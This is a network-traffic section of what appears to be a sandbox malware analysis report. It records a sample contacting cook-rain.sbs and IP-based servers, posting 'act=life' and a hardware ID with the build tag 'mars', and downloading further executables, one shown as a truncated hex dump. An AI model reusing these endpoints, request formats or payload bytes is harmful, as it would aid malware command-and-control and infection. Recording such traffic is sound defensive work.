Nov 19, 2024 21:02:39.447948933 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.447959900 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.447962999 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.447968006 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.447972059 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.447983980 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.447990894 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.447995901 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448008060 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448019028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448023081 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448029995 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448040962 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448057890 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448080063 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448849916 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448863029 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448873043 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448884964 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448890924 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448895931 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448906898 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448914051 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448916912 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448929071 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448939085 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448940039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448950052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448961020 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448964119 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448971033 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448981047 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.448990107 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.448992014 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449004889 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449013948 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449016094 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449052095 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449620008 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449632883 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449644089 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449656010 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449666023 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449667931 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449680090 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449687958 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449690104 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449702024 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449702024 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449712992 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449723005 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449729919 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449736118 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449747086 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449759007 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449769974 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449773073 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449773073 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449781895 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449791908 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449791908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449804068 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449815035 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449815989 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449826956 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.449836969 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.449858904 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450558901 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450570107 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450581074 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450592041 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450602055 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450613022 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450614929 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450623989 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450634003 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450634956 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450644970 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450655937 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450656891 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450669050 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450674057 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450680017 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450690985 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450690985 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450702906 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450712919 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.450716972 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.450741053 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.451234102 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451246023 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451256990 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451267958 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451278925 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451287985 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.451291084 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451302052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451318026 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.451318979 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:39.451328039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.494894028 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:39.615612030 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:42.814604044 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:42.819420099 CET	80	49876	185.215.113.206	192.168.2.7
Nov 19, 2024 21:02:42.819509029 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:42.820132017 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:42.824919939 CET	80	49876	185.215.113.206	192.168.2.7
Nov 19, 2024 21:02:43.542540073 CET	80	49876	185.215.113.206	192.168.2.7
Nov 19, 2024 21:02:43.542604923 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:43.545356989 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:43.550178051 CET	80	49876	185.215.113.206	192.168.2.7
Nov 19, 2024 21:02:43.772763014 CET	80	49876	185.215.113.206	192.168.2.7
Nov 19, 2024 21:02:43.772902966 CET	49876	80	192.168.2.7	185.215.113.206
Nov 19, 2024 21:02:47.570841074 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:47.571096897 CET	49876	80	192.168.2.7	185.215.113.206

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 21:02:17.057391882 CET	56004	53	192.168.2.7	1.1.1.1
Nov 19, 2024 21:02:17.068217039 CET	53	56004	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 19, 2024 21:02:17.057391882 CET	192.168.2.7	1.1.1.1	0x89e4	Standard query (0)	cook-rain.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 19, 2024 21:02:17.068217039 CET	1.1.1.1	192.168.2.7	0x89e4	No error (0)	cook-rain.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 19, 2024 21:02:17.068217039 CET	1.1.1.1	192.168.2.7	0x89e4	No error (0)	cook-rain.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cook-rain.sbs

185.215.113.16

185.215.113.206

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49839	185.215.113.16	80	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 19, 2024 21:02:36.904601097 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49840	185.215.113.16	80	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 19, 2024 21:02:37.200905085 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 19, 2024 21:02:37.794797897 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 19 Nov 2024 20:02:37 GMT Content-Type: application/octet-stream Content-Length: 1814528 Last-Modified: Tue, 19 Nov 2024 19:58:34 GMT Connection: keep-alive ETag: "673cedea-1bb000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 c2 de [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g"pi@i@M$a$$ $b@.rsrc$r@.idata $t@ *$v@smsoyiwh @Ox@mwymltiy`i@.taggant0pi"@
Nov 19, 2024 21:02:37.794825077 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 19, 2024 21:02:37.794840097 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 19, 2024 21:02:37.794852018 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 19, 2024 21:02:37.794862986 CET	1236	IN	Data Raw: f7 57 8f f7 c9 3c e4 74 02 e8 17 7a 8d bf fc 7e f7 c6 15 d2 49 21 bb 14 ea c0 58 d3 25 57 eb 6a 5a 37 3a 73 84 1c 48 d4 c4 d6 d8 27 f5 c3 22 0b a2 6d 1b 83 ea c4 be 4c e3 b7 14 cf 94 c7 2e 44 62 0a b7 33 7a 2e 53 ce cf 54 20 d2 6b ed 0a ea e1 af Data Ascii: W<tz~I!X%WjZ7:sH'"mL.Db3z.ST kg7"jTh,=\|>k8:l/IFVeKfol;N[`:$_UAO"B[{q.4e{#uKN\Mg2Rf2)&oj2*h$"\|j G(^W
Nov 19, 2024 21:02:37.794873953 CET	1236	IN	Data Raw: f4 58 22 14 cb bf f4 4b 4c 34 b0 f9 38 9c 47 dc f8 b1 56 84 0b 1f 5c 97 4a 02 ab dc a3 b0 d2 e9 db b2 cc 76 c4 13 26 4d 37 61 15 cf 22 d1 80 ec 28 dc d3 79 8b a1 d2 b1 86 54 e4 5b 64 79 29 c4 39 4e 55 49 ee 58 31 2b 23 33 94 ae eb 53 ab 23 2b 7a Data Ascii: X"KL48GV\Jv&M7a"(yT[dy)9NUIX1+#3S#+z;o+YdfzwGFhy$;xt?q-B~_l~xkbM/7LLW3XO(NiD~VHNcU-xucM}57
Nov 19, 2024 21:02:37.794884920 CET	1236	IN	Data Raw: ea 87 f5 2f 93 97 b2 27 24 a7 cc e9 49 97 d8 f1 15 f3 c6 6b 2a 91 03 ec 49 af ca 2d 66 bf 8a 27 ee fa e3 66 3a aa 04 f3 25 fd d3 d7 00 77 cd 49 5a b3 46 04 46 80 a2 22 f8 74 2a 72 66 b1 5a 03 32 80 8c 24 69 77 d6 49 82 b3 7a 04 da f3 db 92 27 d9 Data Ascii: /'$IkI-f'f:%wIZFF"trfZ2$iwIz'COv}J$sf\|*%PkQx~!:xI2lic>Llq^$yzfl4$8NeS[2A+So9RJ
Nov 19, 2024 21:02:37.794977903 CET	1236	IN	Data Raw: e7 ca a3 f7 6e de 8b 06 f4 a3 44 f8 e5 fd e6 ac 06 31 8a 32 70 85 92 66 62 fa 0a 97 26 8a 46 48 ea 85 5e 27 56 77 1a 81 2b 74 20 9a ea 85 8a 26 b6 91 4b 0a 69 b3 d1 65 35 77 db c9 24 0b 4c 06 52 c5 0c 1a da 85 ca f1 06 f7 fe 6d 72 c9 56 bc f3 97 Data Ascii: nD12pfb&FH^'Vw+t &Kie5w$LRmrVp."#%m~?afFm}z$r@37err~2gG"%gew-$NiiijsfzB0]2JCS$l=#
Nov 19, 2024 21:02:37.794989109 CET	1236	IN	Data Raw: 42 12 d9 95 04 3b d4 73 f6 91 49 2f 6a 4c dc f1 a1 f3 6a 6f 2a e8 4e 4c 0e 1b f7 6a 22 13 ce e7 01 e0 a9 f3 4b 94 62 3a f8 b2 5a 04 6a b1 0f 16 f0 e9 ca f7 b1 be 2a 6c 72 a6 58 ec b6 4f d9 f1 d5 f9 ea 52 f7 90 8b 66 ea a4 10 fa 92 97 6a 24 0e 7a Data Ascii: B;sI/jLjoNLj"Kb:ZjlrXORfj$z;DSz;6n$K#j=5\|GmcF'H3:e_eI$L6$ yB.jCiFio"Vkjli22r=s3
Nov 19, 2024 21:02:37.795001030 CET	1148	IN	Data Raw: f7 31 e8 e3 f7 83 07 06 9a 91 02 f4 41 0a ef 26 6b a3 04 f8 4d 80 ec f5 67 c1 d7 73 ea bf fe fc 29 f7 aa f6 2b 72 34 28 36 f3 d6 45 27 12 f3 e6 10 6a c5 6d f6 e3 63 f8 61 77 4a 26 6c 54 47 f2 e8 d7 4e 6a 76 b1 9a 6a 06 3e e5 f5 69 51 d9 f1 95 f3 Data Ascii: 1A&kMgs)+r4(6E'jmcawJ&lTGNjvj>iQm(vI8S'r$Osk6'F9 #))&3Kjgy&#gmu`C]l})G;dO='50m"{6'wR
Nov 19, 2024 21:02:37.882626057 CET	1236	IN	Data Raw: 38 1c 02 ab 7e c4 61 3f 8b e6 c9 3d f8 70 36 a5 a4 7f 9a 27 eb 9c 1b 21 79 2f 6f 48 d6 f4 55 8d 0f 44 9d fb 08 b8 91 6d 4e 9f 9a f8 48 1e c9 82 d2 0f 64 cd 23 c6 4f 4e 54 06 d7 76 46 75 d8 26 8a a1 44 e5 64 75 13 34 0a d0 b2 38 cd b2 b6 92 2e f1 Data Ascii: 8~a?=p6'!y/oHUDmNHd#ONTvFu&Ddu48.#Ir'(Ylb2p0@VJmBEn?cqsbVNo(GJn( #EG:;lvF\|)~7xgD{P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49876	185.215.113.206	80	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 19, 2024 21:02:42.820132017 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 19, 2024 21:02:43.542540073 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 19, 2024 21:02:43.545356989 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 39 39 33 45 46 35 32 30 39 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="hwid"E993EF520935574217965------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build"mars------ECGHJJEHDHCAAKFIIDGI--
Nov 19, 2024 21:02:43.772763014 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:17 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cook-rain.sbs
2024-11-19 20:02:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-19 20:02:18 UTC	981	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rgocnmcsgmpa3gqnh0binfash8; expires=Sat, 15-Mar-2025 13:48:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8IhHGGZgJiUaTLrAlYg68ewBh9U4SH3a3PKS%2Fc6QxJOBGjkhXudU2dmhPnz%2BLEmNj6qMOPZq8A9JaVUa0mhm%2FoHDtSZiuepkVRw2d9tk2C9gFk7pstrVxm6QGOuhbapn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc0cdd8e728d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2002&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1434889&cwnd=244&unsent_bytes=0&cid=3875e57ac940ab55&ts=1392&x=0"
2024-11-19 20:02:18 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-19 20:02:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49725	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:20 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: cook-rain.sbs
2024-11-19 20:02:20 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-19 20:02:20 UTC	982	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2hn3pungenhtmiofqharflgmuh; expires=Sat, 15-Mar-2025 13:48:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P0D4B%2BovNNUW8hVp6c5CaHC145%2FqHqzm6%2FyXWPbnUF7vOvajv23XBMSLuygFErTMluIY7vuQpBEOxmZEzBYhdVzZRpE49UE4JgDuZ91%2B5japfGeEfJzWNMk0OgRkUUNz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc1e9da4c34e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1880231&cwnd=224&unsent_bytes=0&cid=5fb0547d7f4bb076&ts=436&x=0"
2024-11-19 20:02:20 UTC	387	IN	Data Raw: 34 34 36 63 0d 0a 53 75 32 2b 6a 4f 38 43 6f 6c 42 36 63 51 6f 69 4d 4a 32 58 5a 2f 69 67 72 49 30 57 4b 68 30 6e 30 2b 49 74 4f 5a 4d 65 65 34 4d 78 7a 38 69 75 31 54 61 4f 63 67 6b 55 4b 42 68 45 37 2b 49 43 31 49 4c 4e 36 54 51 51 65 30 61 2f 6b 55 67 56 73 57 67 57 6f 58 43 4c 33 2b 43 63 5a 34 35 79 48 77 6b 6f 47 47 76 6d 74 51 4b 57 67 70 61 76 63 30 42 2f 52 72 2b 41 54 46 4c 38 62 68 66 67 49 6f 48 5a 35 49 70 68 78 6a 45 57 48 47 39 48 56 66 7a 39 43 5a 48 4e 78 4f 41 30 42 6a 39 43 71 63 41 58 47 39 35 37 44 2b 49 48 6a 4d 33 6e 7a 58 2b 4f 4b 31 67 55 5a 41 41 4b 76 2f 59 43 6d 73 7a 4b 36 58 31 43 64 55 2b 33 67 55 6c 54 34 33 63 64 36 79 4b 50 32 75 57 41 61 4e 49 38 48 42 74 6b 51 56 2f 38 74 55 76 61 78 64 61 76 4c 41 67 73 64 37 4b 52 58 Data Ascii: 446cSu2+jO8ColB6cQoiMJ2XZ/igrI0WKh0n0+ItOZMee4Mxz8iu1TaOcgkUKBhE7+IC1ILN6TQQe0a/kUgVsWgWoXCL3+CcZ45yHwkoGGvmtQKWgpavc0B/Rr+ATFL8bhfgIoHZ5IphxjEWHG9HVfz9CZHNxOA0Bj9CqcAXG957D+IHjM3nzX+OK1gUZAAKv/YCmszK6X1CdU+3gUlT43cd6yKP2uWAaNI8HBtkQV/8tUvaxdavLAgsd7KRX
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 52 54 6e 4b 49 2b 63 6f 4d 31 6e 32 48 4a 41 55 30 74 46 51 76 6a 35 45 39 6a 34 6a 76 41 36 55 54 39 43 76 63 41 58 47 2f 6c 35 47 75 49 6a 67 4e 2f 6d 68 6e 4c 41 49 42 34 65 62 56 4a 55 2b 76 73 50 6d 64 44 45 34 58 4a 4c 64 6b 36 34 68 55 68 66 73 54 4a 5a 35 6a 44 50 68 4b 36 73 62 63 73 2b 45 67 52 6f 41 45 32 78 37 45 57 64 7a 6f 36 33 4e 45 78 2b 51 62 43 45 51 56 58 31 63 42 2f 76 4a 59 44 61 35 49 31 6e 79 6a 6f 51 45 6d 56 4c 58 66 2f 77 43 4a 37 45 77 75 35 78 43 44 45 46 74 70 67 50 41 37 46 53 48 75 49 36 7a 65 6e 74 67 32 37 48 4a 46 67 4d 4a 6c 6b 53 2b 50 6c 46 77 6f 4c 41 36 6e 74 61 66 6c 65 30 6a 6c 31 58 39 48 6f 55 34 69 61 50 32 65 6d 41 62 73 59 31 47 78 